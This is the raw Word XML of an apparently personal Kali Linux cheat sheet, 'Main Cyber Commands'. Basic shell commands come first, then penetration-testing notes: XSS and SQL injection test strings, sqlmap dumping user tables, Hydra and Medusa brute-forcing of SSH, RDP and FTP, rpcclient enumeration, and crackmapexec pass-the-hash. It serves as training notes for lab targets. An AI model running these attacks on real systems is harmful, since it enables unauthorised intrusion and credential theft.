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E9B8DB" w14:textId="49EB5E89" w:rsidR="00D841C6" w:rsidRPr="00AD7813" w:rsidRDefault="00AD7813" w:rsidP="003467DE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
          <w:u w:val="single"/>
          <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
            <w14:noFill/>
            <w14:prstDash w14:val="solid"/>
            <w14:round/>
          </w14:textOutline>
          <w14:props3d w14:extrusionH="57150" w14:contourW="0" w14:prstMaterial="softEdge">
            <w14:bevelT w14:w="25400" w14:h="38100" w14:prst="circle"/>
          </w14:props3d>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
          <w:u w:val="single"/>
          <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
            <w14:noFill/>
            <w14:prstDash w14:val="solid"/>
            <w14:round/>
          </w14:textOutline>
          <w14:props3d w14:extrusionH="57150" w14:contourW="0" w14:prstMaterial="softEdge">
            <w14:bevelT w14:w="25400" w14:h="38100" w14:prst="circle"/>
          </w14:props3d>
        </w:rPr>
        <w:t xml:space="preserve">Main </w:t>
      </w:r>
      <w:r w:rsidR="003467DE" w:rsidRPr="00AD7813">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
          <w:u w:val="single"/>
          <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
            <w14:noFill/>
            <w14:prstDash w14:val="solid"/>
            <w14:round/>
          </w14:textOutline>
          <w14:props3d w14:extrusionH="57150" w14:contourW="0" w14:prstMaterial="softEdge">
            <w14:bevelT w14:w="25400" w14:h="38100" w14:prst="circle"/>
          </w14:props3d>
        </w:rPr>
        <w:t>Cyber Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0084EF" w14:textId="1153F28D" w:rsidR="00772D97" w:rsidRDefault="00772D97" w:rsidP="00772D97">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24A9517" w14:textId="7F463C75" w:rsidR="00A716BA" w:rsidRPr="00A716BA" w:rsidRDefault="00A716BA" w:rsidP="00A716BA">
      <w:pPr>
        <w:jc w:val="center"/>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16BA">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General commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BAD70C" w14:textId="43CCB13C" w:rsidR="00613EAF" w:rsidRDefault="00786159" w:rsidP="0069419E">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ls – shows files and directories in my current location</w:t>
      </w:r>
      <w:r w:rsidR="0069419E">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0A0D7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ls -a – shows directories and hidden files</w:t>
      </w:r>
      <w:r w:rsidR="0069419E">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E0359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ls -l – shows info on the dir and files like size</w:t>
      </w:r>
      <w:r w:rsidR="0080350A">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t>
      </w:r>
      <w:r w:rsidR="00E0359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w:t>
      </w:r>
      <w:r w:rsidR="0080350A">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t>
      </w:r>
      <w:r w:rsidR="00E0359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permissions</w:t>
      </w:r>
      <w:r w:rsidR="0069419E">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613EA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ls -R – show recursively all the directories from my current location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470F316D" w14:textId="20612B9E" w:rsidR="003B35C9" w:rsidRDefault="00F954CE" w:rsidP="003B35C9">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locate rockyou.txt – print all the passes of files that contain the name rockyou.txt</w:t>
      </w:r>
      <w:r w:rsidR="003B35C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3B35C9" w:rsidRPr="003B35C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sudo find / -name rockyou.txt</w:t>
      </w:r>
      <w:r w:rsidR="003B35C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search for rockyou.txt file and shows the path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21202C4F" w14:textId="61DCD294" w:rsidR="00772D97" w:rsidRDefault="00772D97" w:rsidP="003467DE">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sudo – means super user do.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DE4388" w14:textId="752DD522" w:rsidR="00B31BEF" w:rsidRDefault="00B31BEF" w:rsidP="003467DE">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>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su </w:t>
      </w:r>
      <w:r w:rsidR="006749F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kali </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switch user</w:t>
      </w:r>
      <w:r w:rsidR="006749F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kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6576E38F" w14:textId="5C12A380" w:rsidR="00E0359F" w:rsidRPr="00E0359F" w:rsidRDefault="00E0359F" w:rsidP="003467DE">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pwd – shows my current location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1102059D" w14:textId="3503EDAF" w:rsidR="000A0D7F" w:rsidRDefault="000A0D7F" w:rsidP="00227792">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cd / - go to the first directory</w:t>
      </w:r>
      <w:r w:rsidR="0022779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cd .. – go one directory back</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32002FB3" w14:textId="0AFAC90C" w:rsidR="000A0D7F" w:rsidRDefault="00605A20" w:rsidP="003467DE">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sudo nano asd.txt – edit a file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30079D1E" w14:textId="667621AC" w:rsidR="00605A20" w:rsidRDefault="00605A20" w:rsidP="00605A20">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cat  asd.txt</w:t>
      </w:r>
      <w:r w:rsidR="00406BD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print a file content</w:t>
      </w:r>
      <w:r w:rsidR="00406BD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cat *.txt – enter all the text files</w:t>
      </w:r>
      <w:r w:rsidR="002D2B4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cat -n f27 – print the file content and sign each line with its number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B68005" w14:textId="4E8D6836" w:rsidR="00EC2FA6" w:rsidRDefault="00EC2FA6" w:rsidP="00605A20">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awk ‘{print $3}’ – print the third column</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awk ‘{print $NF}’ – print the last column</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awk ‘{print$(NF -1)}’ – print the second line from the end</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awk ‘{print $1, $2, $3}’ – print the first 3 lines</w:t>
      </w:r>
      <w:r w:rsidR="00DD7DC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awk -F@ ‘{print $2}’ – separate all the lines where found @ and print the second column from all the columns.</w:t>
      </w:r>
      <w:r w:rsidR="00DD7DC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awk ‘length &gt; 7’ – prints all the lines that have more than 7 chars</w:t>
      </w:r>
      <w:r w:rsidR="008D404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awk ‘NR == 111’ – print the line 111</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C6A24F" w14:textId="5FAD9DD4" w:rsidR="00074A8B" w:rsidRDefault="00074A8B" w:rsidP="00A71BB3">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head  -30 – prints the first 30 lines (the default is 10)</w:t>
      </w:r>
      <w:r w:rsidR="00A71BB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tail – print the last 10 lines</w:t>
      </w:r>
      <w:r w:rsidR="00A71BB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head -97 | tail -1 – print line number 97</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B98864" w14:textId="27FF0391" w:rsidR="00074A8B" w:rsidRDefault="00074A8B" w:rsidP="00605A20">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sed ‘s/r/x/g’ – switch the char r in x in globally.</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sort – sort the ouput so identical words and number will shows together</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uniq – delete </w:t>
      </w:r>
      <w:r w:rsidR="00D37B8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adjacent words, that’s why have to come after sort</w:t>
      </w:r>
      <w:r w:rsidR="00D37B8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uniq -c - delete adjacent words and count how many duplicates</w:t>
      </w:r>
      <w:r w:rsidR="0095298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uniq -ic – delete adjacent words and count how many duplicates and ignore case sensitive</w:t>
      </w:r>
      <w:r w:rsidR="00D37B8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sort -n – sort by number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D3FCD3" w14:textId="47CE1263" w:rsidR="008D404F" w:rsidRDefault="008D404F" w:rsidP="00605A20">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wc -l – count number f lines</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wc -m/c – count number of chars or bytes, which is the same</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wc -w – counts the number of words</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3785BE66" w14:textId="1BA5F68C" w:rsidR="00D37B8F" w:rsidRPr="00074A8B" w:rsidRDefault="00D37B8F" w:rsidP="00605A20">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 ‘a-z’ ‘A-Z’ – replacing all the chars a-z in A-Z</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tr ‘\t’ ‘\n’ – instead of tab go down a line </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EF428D" w14:textId="77777777" w:rsidR="006D49FC" w:rsidRDefault="006D49FC" w:rsidP="006D49FC">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 – prints the current date.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD8DECF" w14:textId="77777777" w:rsidR="006D49FC" w:rsidRDefault="006D49FC" w:rsidP="006D49FC">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Ifconfig – prints the network configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677AF15F" w14:textId="07BF9F1C" w:rsidR="00806014" w:rsidRDefault="00806014" w:rsidP="006D49FC">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clear – clear the terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3C64AD" w14:textId="0E58ECEA" w:rsidR="006D49FC" w:rsidRDefault="006D49FC" w:rsidP="006D49FC">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Mkdir ddwd – creating a directoy called ddwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367AC794" w14:textId="0B1843D8" w:rsidR="006D49FC" w:rsidRDefault="006D49FC" w:rsidP="006D49FC">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Whoami – prints the current user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2CD889" w14:textId="1A1926A2" w:rsidR="00605A20" w:rsidRDefault="002F4F3E" w:rsidP="002F4F3E">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sudo rm -f – remove a file</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sudo rm -d – remove empty directory</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605A2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sudo rm -rd dddd – remove a</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not empty</w:t>
      </w:r>
      <w:r w:rsidR="00605A2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directory ( r stands for recursive)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D7DDE8" w14:textId="77777777" w:rsidR="00605A20" w:rsidRDefault="00605A20" w:rsidP="00605A20">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mv /home/kali/flag.txt /home/kali/Desktop – move the file from the first path to the other</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E6BE00" w14:textId="6E53D848" w:rsidR="00605A20" w:rsidRDefault="00605A20" w:rsidP="00605A20">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cp /home/kali/flag.txt /home/kali/Desktop – copy the file from the first path and paste in the other path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F04E50F" w14:textId="526F745B" w:rsidR="009163B0" w:rsidRDefault="009163B0" w:rsidP="00605A20">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uptime – output the amount of time and users logged since the last boot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B670C8" w14:textId="2D29ECB3" w:rsidR="006D49FC" w:rsidRDefault="006D49FC" w:rsidP="00605A20">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sudo passwd kali</w:t>
      </w:r>
      <w:r w:rsidR="00B215E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/root</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change password for the user kali</w:t>
      </w:r>
      <w:r w:rsidR="00B215E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/root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5638866A" w14:textId="5D903E97" w:rsidR="005855F8" w:rsidRDefault="005855F8" w:rsidP="00605A20">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sudo apt-get update – update the packages</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sudo apt-get upgrade – upgrade the packages</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sudo apt-get install cmatrix – install cmatrix package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55ACB66F" w14:textId="61DBC323" w:rsidR="006D49FC" w:rsidRDefault="006D49FC" w:rsidP="00A716BA">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chmod – change mode, change the permissions setting of a file.</w:t>
      </w:r>
      <w:r w:rsidR="00A716BA">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sudo chmod +x file.sh – change the file permissions so we could run it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3AEF49" w14:textId="3A63E2A4" w:rsidR="00372529" w:rsidRDefault="00605A20" w:rsidP="00C11F4F">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echo "hello" – prints “hello”</w:t>
      </w:r>
      <w:r w:rsidR="0013683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echo “hello” &gt;&gt; file.txt – add the text in the file, if the file </w:t>
      </w:r>
      <w:r w:rsidR="001A42D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does not exist</w:t>
      </w:r>
      <w:r w:rsidR="0013683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 creates it</w:t>
      </w:r>
      <w:r w:rsidR="0013683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echo “hello” &gt; file.txt - put the text in the file, if the file exist, it override it</w:t>
      </w:r>
      <w:r w:rsidR="00C11F4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C11F4F" w:rsidRPr="00C11F4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echo -e 'hello\nhello'</w:t>
      </w:r>
      <w:r w:rsidR="00C11F4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go down a line</w:t>
      </w:r>
      <w:r w:rsidR="0037252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372529" w:rsidRPr="0037252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echo -e </w:t>
      </w:r>
      <w:r w:rsidR="0005677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72529" w:rsidRPr="0037252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\033[1mexiting...\033[0m</w:t>
      </w:r>
      <w:r w:rsidR="0005677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72529" w:rsidRPr="0037252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7252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bold the text</w:t>
      </w:r>
      <w:r w:rsidR="00CA2A1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6C0698" w:rsidRPr="006C069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echo -e </w:t>
      </w:r>
      <w:r w:rsidR="0005677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6C0698" w:rsidRPr="006C069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\033[31mexiting...\033[0m</w:t>
      </w:r>
      <w:r w:rsidR="006C069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6C0698" w:rsidRPr="006C069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use red text</w:t>
      </w:r>
      <w:r w:rsidR="00C11F4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\n – go down a line</w:t>
      </w:r>
      <w:r w:rsidR="0037252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A664C2" w:rsidRPr="0037252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\033[1m</w:t>
      </w:r>
      <w:r w:rsidR="00A664C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7252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Start bold text</w:t>
      </w:r>
      <w:r w:rsidR="006C069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6C0698" w:rsidRPr="006C069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\033[31m</w:t>
      </w:r>
      <w:r w:rsidR="006C069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start red text</w:t>
      </w:r>
      <w:r w:rsidR="006C069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6C0698" w:rsidRPr="0037252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\033[0m</w:t>
      </w:r>
      <w:r w:rsidR="006C069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006C0698" w:rsidRPr="006C069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reset the text formatting to the terminal's default settings</w:t>
      </w:r>
      <w:r w:rsidR="00B839D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p w14:paraId="4CB85727" w14:textId="7EF6AC6B" w:rsidR="006C60E7" w:rsidRPr="00361DDD" w:rsidRDefault="006C60E7" w:rsidP="00361DDD">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figlet “this is my project” – command to print</w:t>
      </w:r>
      <w:r w:rsidR="00B839D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large text for</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titles</w:t>
      </w:r>
      <w:r w:rsidR="00361DD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361DDD" w:rsidRPr="00361DD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figlet -f slant "Forensic investigation"</w:t>
      </w:r>
      <w:r w:rsidR="00361DD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print the headline in slant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6295BD4F" w14:textId="32FA77E5" w:rsidR="00136837" w:rsidRPr="00372529" w:rsidRDefault="00136837" w:rsidP="00136837">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2090E4F" w14:textId="1076D514" w:rsidR="00882BF3" w:rsidRDefault="00882BF3" w:rsidP="00136837">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md5sum file.txt – calculate the md5 hash of the file</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sha1sum file.txt – calculate the sha1 hash of the file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1764EB51" w14:textId="77777777" w:rsidR="00502E69" w:rsidRDefault="00502E69" w:rsidP="00502E69">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sudo service ssh start/stop/status – for start stop or check the status of service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A44AE2" w14:textId="77777777" w:rsidR="00502E69" w:rsidRDefault="00502E69" w:rsidP="00502E69">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Wget </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="008D369C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>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http://ss</w:t>
        </w:r>
      </w:hyperlink>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downloads the file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FD9191" w14:textId="35F11E55" w:rsidR="00461CCA" w:rsidRDefault="00461CCA" w:rsidP="00502E69">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git clone http://github.com....</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03433891" w14:textId="07F1201E" w:rsidR="00406BD8" w:rsidRDefault="00502E69" w:rsidP="00406BD8">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Curl – a command line tool that enables exchange between a device and a server through terminal.</w:t>
      </w:r>
      <w:r w:rsidR="00406BD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770284D" w14:textId="68FCD0E3" w:rsidR="009A2FE7" w:rsidRDefault="00502E69" w:rsidP="009A2FE7">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grep “hello” – search for the word hello</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grep -i “hello” - search for the word hello without care for case sensitive</w:t>
      </w:r>
      <w:r w:rsidR="0065544A">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grep -v</w:t>
      </w:r>
      <w:r w:rsidR="00F2180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123456</w:t>
      </w:r>
      <w:r w:rsidR="0065544A">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exclude </w:t>
      </w:r>
      <w:r w:rsidR="00F2180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every word or number that contains 123456</w:t>
      </w:r>
      <w:r w:rsidR="003A5B8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grep ‘\S’ – delete empty lines</w:t>
      </w:r>
      <w:r w:rsidR="006C752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grep -w “hi” – search only for the word “hi” and not strings that contain “hi”</w:t>
      </w:r>
      <w:r w:rsidR="00D5584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grep -E ‘^[0-9]+$’</w:t>
      </w:r>
      <w:r w:rsidR="006C752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5584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5584C" w:rsidRPr="00D5584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show only lines that contain numbers</w:t>
      </w:r>
      <w:r w:rsidR="00D5584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grep -R “hello” – search recursively in all the dir and files from the current path the word “hello”</w:t>
      </w:r>
      <w:r w:rsidR="00B106E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D5584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30858" w:rsidRPr="00C3085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grep -Eo '([0-9]{1,2}|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.([0-9]{1,2}|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.([0-9]{1,2}|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.([0-9]{1,2}|1[0-9]{2}|2[0-4][0-9]|25[0-5])'</w:t>
      </w:r>
      <w:r w:rsidR="00C3085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find only ip (maybe its not accurate)</w:t>
      </w:r>
      <w:r w:rsidR="0025543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grep ‘password\|pass\|pwd’ *.txt – search for every word here in the files</w:t>
      </w:r>
      <w:r w:rsidR="009A2FE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grep -I zip -B 8 – print 8 lines before the word</w:t>
      </w:r>
      <w:r w:rsidR="009A2FE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grep -I zip -A 8 – print 8 lines after the word</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEBC071" w14:textId="03AC78B5" w:rsidR="00E52D0A" w:rsidRPr="00E52D0A" w:rsidRDefault="00E52D0A" w:rsidP="000D0B27">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netstat -an</w:t>
      </w:r>
      <w:r w:rsidR="0005741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known option</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netstat -tapn -</w:t>
      </w:r>
      <w:r w:rsidRPr="0062161E">
        <w:t xml:space="preserve"> </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known option</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netstat -planetu - known option</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1038E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038E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Show both listening and non-listening sockets</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1038E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038E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Show numerical addresses instead of resolving names</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1038E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038E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Show only listening sockets</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1038E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038E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Show TCP connections</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1038E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Pr="001038E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Show UDP connections</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1038E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Pr="001038E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Show the PID and name of the program to which each socket belongs</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1038E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Pr="001038E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Show extended information, useful for extra details like user IDs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BBC5E6" w14:textId="77777777" w:rsidR="002170DA" w:rsidRDefault="002170DA" w:rsidP="00C30858">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61CEF45" w14:textId="35806355" w:rsidR="002170DA" w:rsidRDefault="002170DA" w:rsidP="00C30858">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python -m http.server 8000 – open port 8000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D645A9C" w14:textId="3ADFF5FB" w:rsidR="00B150B7" w:rsidRDefault="00C44632" w:rsidP="00B150B7">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ssh </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="006028B0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>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joe@10.10.10.10</w:t>
        </w:r>
      </w:hyperlink>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connect using ssh to the machine 10.10.10.10 with joe user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AA8D42" w14:textId="1EB1A542" w:rsidR="001D0E2C" w:rsidRDefault="001D0E2C" w:rsidP="00B150B7">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Sshpass -p ‘kali’ ssh -o StrictHostKeyChecking=no</w:t>
      </w:r>
      <w:r w:rsidR="000104D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r:id="rId8" w:history="1">
        <w:r w:rsidR="000104DD" w:rsidRPr="00622BB2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>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kali@10.10.10.10</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="000104D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“nmap 8.8.8.8” -sV -oG /home/kali/Desktop/nmap.txt – using the password kali (-p) with user kali, and run nmap scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C5ECC6" w14:textId="0E469831" w:rsidR="00B53A54" w:rsidRPr="00987E1B" w:rsidRDefault="00987E1B" w:rsidP="00987E1B">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7E1B">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sshpass -p "$ssh_pass" scp /home/kali/Try.sh "$ssh_user"@"$ssh_ip":/home/"$ssh_user"</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for transfer a file from first machine to the second machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344B838C" w14:textId="76AE6DFA" w:rsidR="00C44632" w:rsidRDefault="00C44632" w:rsidP="00C30858">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nc 10.10.10.10 22 – connect port 22 (does not provide security)</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nc -lvp 30 – listening, verbose, port, listen to port 30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEA7C86" w14:textId="36E6DAEC" w:rsidR="009D0E12" w:rsidRDefault="009D0E12" w:rsidP="00C30858">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xsltproc all_nmap.xml &gt;&gt; nmap.html – convert xml to html (more readable)</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firefox nmap.html</w:t>
      </w:r>
      <w:r w:rsidR="00800C8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open html file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12609430" w14:textId="06A3ED78" w:rsidR="00980E0E" w:rsidRDefault="00E254BD" w:rsidP="00E254BD">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sudo </w:t>
      </w:r>
      <w:r w:rsidRPr="00E254B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zip -r </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hello</w:t>
      </w:r>
      <w:r w:rsidRPr="00E254B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.zip "$first_location/$name_of_dir"</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zip all the directories and files in the location provided and call the zip directory hello.zip </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980E0E">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sudo gunzip rockyou.txt.gz – open gz file</w:t>
      </w:r>
      <w:r w:rsidR="003D0EA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sudo unzip filename – for open zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17692072" w14:textId="6A521865" w:rsidR="008D1514" w:rsidRDefault="008D1514" w:rsidP="00C30858">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echo -n “hello” | sha1sum – it will convert the word “hello” to hash in type of sha1sum, the -n is for explicit to not go down for another line, for the hash to be accurate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1386DF13" w14:textId="006A64F2" w:rsidR="00647E23" w:rsidRDefault="00647E23" w:rsidP="00C30858">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 = erel</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echo “hello $name” – “hello erel”, variables in terminal </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465C413D" w14:textId="709FBF46" w:rsidR="00634FC1" w:rsidRDefault="00634FC1" w:rsidP="00634FC1">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34FC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char="${var,,}"</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insert the sentence of var variable into char in lower case</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7773D222" w14:textId="75E6A8E8" w:rsidR="00C37C9A" w:rsidRDefault="00C37C9A" w:rsidP="00C30858">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 file in $(ls); do echo “$file”; sleep 2; done – print the names of the files in the directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110FAC3F" w14:textId="77777777" w:rsidR="008A6D1E" w:rsidRDefault="00B30837" w:rsidP="00EA6EB0">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binwalk harddisk.vmdk – shows us which files inside</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binwalk -e harddisk.vmdk – extract files inside it can to, default directory name determined by the name of the file been carved</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4053913B" w14:textId="77777777" w:rsidR="008A6D1E" w:rsidRDefault="00B30837" w:rsidP="00EA6EB0">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foremost harddisk.vmdk -T output – carve another type of file from binwalk tool, if not specified the name of output, the default name of the directory is “output”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7271E7" w14:textId="77777777" w:rsidR="008A6D1E" w:rsidRDefault="00B30837" w:rsidP="00EA6EB0">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bulk_extractor</w:t>
      </w:r>
      <w:r w:rsidR="005E6FE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E6FE5" w:rsidRPr="005E6FE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harddisk.vmdk</w:t>
      </w:r>
      <w:r w:rsidR="005E6FE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 bulk – has to specify output directory, bulk tool extract a lot of files and sometimes even pcap file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12781870" w14:textId="77777777" w:rsidR="008A6D1E" w:rsidRDefault="005A3156" w:rsidP="00EA6EB0">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strings </w:t>
      </w:r>
      <w:r w:rsidRPr="005A315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harddisk.vmdk</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extract strings from the file, helpful with grep</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115DB823" w14:textId="7E9AC4AD" w:rsidR="00B30837" w:rsidRDefault="00EA6EB0" w:rsidP="00EA6EB0">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exiftool file.elf – extract data on the file such original name and more, it may possible to change this data when loading the file to HxD and change there</w:t>
      </w:r>
      <w:r w:rsidR="00CD253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exiftool car5.jpg -comment = “car” – add new tag</w:t>
      </w:r>
      <w:r w:rsidR="00CD253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exiftool -csv photo.jpg &gt; extracted.csv – save the results to excel file</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0ACA80D" w14:textId="46331C31" w:rsidR="0043317B" w:rsidRDefault="0043317B" w:rsidP="00EA6EB0">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steghide embed -ef a.txt -cf b.txt – cover the file a.txt behind b.txt, ef (embedded file), cf (cover file)</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steghide indo b.txt – show details on the file, maybe ask for password</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steghide extract -sf b.txt – extract the hidden file behind b.txt, sf (secret file)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650ADBCC" w14:textId="51E3B6C5" w:rsidR="00B02F1C" w:rsidRDefault="00B02F1C" w:rsidP="00EA6EB0">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 -jar loader.jar – a command to open the burpsuite (need to run from the burpsuite directory)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DACEACB" w14:textId="6ABF1CED" w:rsidR="00A503FD" w:rsidRDefault="00A503FD" w:rsidP="005832B0">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&lt;script&gt;alert(‘xss attack’)&lt;/script&gt; - script you can insert into input box of a site to see if sql injection works on it</w:t>
      </w:r>
      <w:r w:rsidR="00B369D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used for relational database</w:t>
      </w:r>
      <w:r w:rsidR="00AC0D7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&lt;SCRIPT&gt;alert(‘xss attack’)&lt;/SCRIPT&gt; - maybe they did not filtered big letters</w:t>
      </w:r>
      <w:r w:rsidR="005832B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5832B0" w:rsidRPr="005832B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 * FROM USERS WHERE username=1' OR '1'='1</w:t>
      </w:r>
      <w:r w:rsidR="005832B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sql injection for extract all the users (works only if the table of the users called USERS, you can try also with USERNAME)</w:t>
      </w:r>
      <w:r w:rsidR="00A16B3E">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ls – sql injection</w:t>
      </w:r>
      <w:r w:rsidR="004C174E">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it also possible to encode special characters and use that</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77579631" w14:textId="7D1CA11D" w:rsidR="00810F6C" w:rsidRDefault="00810F6C" w:rsidP="005832B0">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Sqlmap – tool that destined to extract data from DB</w:t>
      </w:r>
      <w:r w:rsidR="000042E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sqlmap -r ddd.txt -D dvwa -T users –dump – extract users and passwords from users table from DB called dvwa by using the exist file ddd.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EB0030" w14:textId="603E97B7" w:rsidR="00C4394F" w:rsidRDefault="00C4394F" w:rsidP="005832B0">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>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Nikto -h 10.10.10.10 – tool for pt in web, could extract data by exploit misconfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D77EF6E" w14:textId="4D8F90C0" w:rsidR="00425FB7" w:rsidRDefault="00425FB7" w:rsidP="005832B0">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Dirb </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="006B41E2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>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http://10.10.10.10/multi</w:t>
        </w:r>
      </w:hyperlink>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search files and directories in this location using brute force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FA0377" w14:textId="4EF149AF" w:rsidR="0036430B" w:rsidRDefault="00FD3637" w:rsidP="0036430B">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Hydra -l kali -p 1234 10.10.10.10 ssh – attack the ssh service on ip 10.10.10.10 with kali user and password 1234, L or P is for list of users or passwords.</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hydra -l malware -p 1 rdp://10.10.10.10 – attack the rdp port with malware user and password 1</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-v for verbose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4007E488" w14:textId="730E94E4" w:rsidR="00697594" w:rsidRDefault="00697594" w:rsidP="0036430B">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Medusa -h 10.10.10.10 -u msfadmin -P /home/kali/file.txt -M ftp – use the user msfadmin with the password file to try brute force on ftp service on ip 10.10.10.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C04DF5" w14:textId="421232FD" w:rsidR="0036430B" w:rsidRDefault="0036430B" w:rsidP="0036430B">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Enum4linux 10.10.10.10 – tool that search info on the target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12217076" w14:textId="376A7EFD" w:rsidR="00601862" w:rsidRDefault="00E45354" w:rsidP="00E45354">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4535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RPC (Remote Procedure Call)</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E204D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rpcclient -u “” -N 10.10.10.10  - try to connect to smb service with no username and no password, the flag -N means no password</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rpcclient -U “pentestme%Passw0rd\!” -c “queryuser Administrator” 10.10.10.10 – connect to ip 10.10.10.10 and run the command queryuser Administrator with the credentials pentestme as user and Passw0rd\! as password, (\ is for the special char ! to be recognized as part of the password), it retrieve info in administrator user.</w:t>
      </w:r>
      <w:r w:rsidR="00CF633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queryuser Administrator – it retrieve info in administrator user, could include user SID, and the groups </w:t>
      </w:r>
      <w:r w:rsidR="00CF633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user is member in</w:t>
      </w:r>
      <w:r w:rsidR="00CF633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enumdomgroups – find the amount of groups in the system</w:t>
      </w:r>
      <w:r w:rsidR="00CF633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enumdomusers – find the amount of users in the system</w:t>
      </w:r>
      <w:r w:rsidR="00CF633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p w14:paraId="56961B57" w14:textId="77777777" w:rsidR="00A36FBE" w:rsidRDefault="00A36FBE" w:rsidP="0034059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E5D8CF3" w14:textId="77777777" w:rsidR="00A36FBE" w:rsidRDefault="00A36FBE" w:rsidP="0034059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6D1F580" w14:textId="77777777" w:rsidR="00A36FBE" w:rsidRDefault="00A36FBE" w:rsidP="0034059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3A736D1" w14:textId="3BF24614" w:rsidR="00FA06B9" w:rsidRDefault="00412636" w:rsidP="00726FC1">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crackmapexec – used mainly for pt, it’s </w:t>
      </w:r>
      <w:r w:rsidR="00C1032A">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mainly </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post exploitation tool</w:t>
      </w:r>
      <w:r w:rsidR="00C1032A">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(could use also for exploit)</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1263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can enumerate information about network shares</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you can use it for run commands and more</w:t>
      </w:r>
      <w:r w:rsidR="00C8563B">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2 main functions of him is PtH (pass the hash) and PtT (pass the ticket)</w:t>
      </w:r>
      <w:r w:rsidR="00726FC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36053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sudo crackmapexec smb 10.10.10.10 -u administrator -p 123456 </w:t>
      </w:r>
      <w:r w:rsidR="000D08C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6053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D08C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the credentials are right it will write “(pwn3d!)”</w:t>
      </w:r>
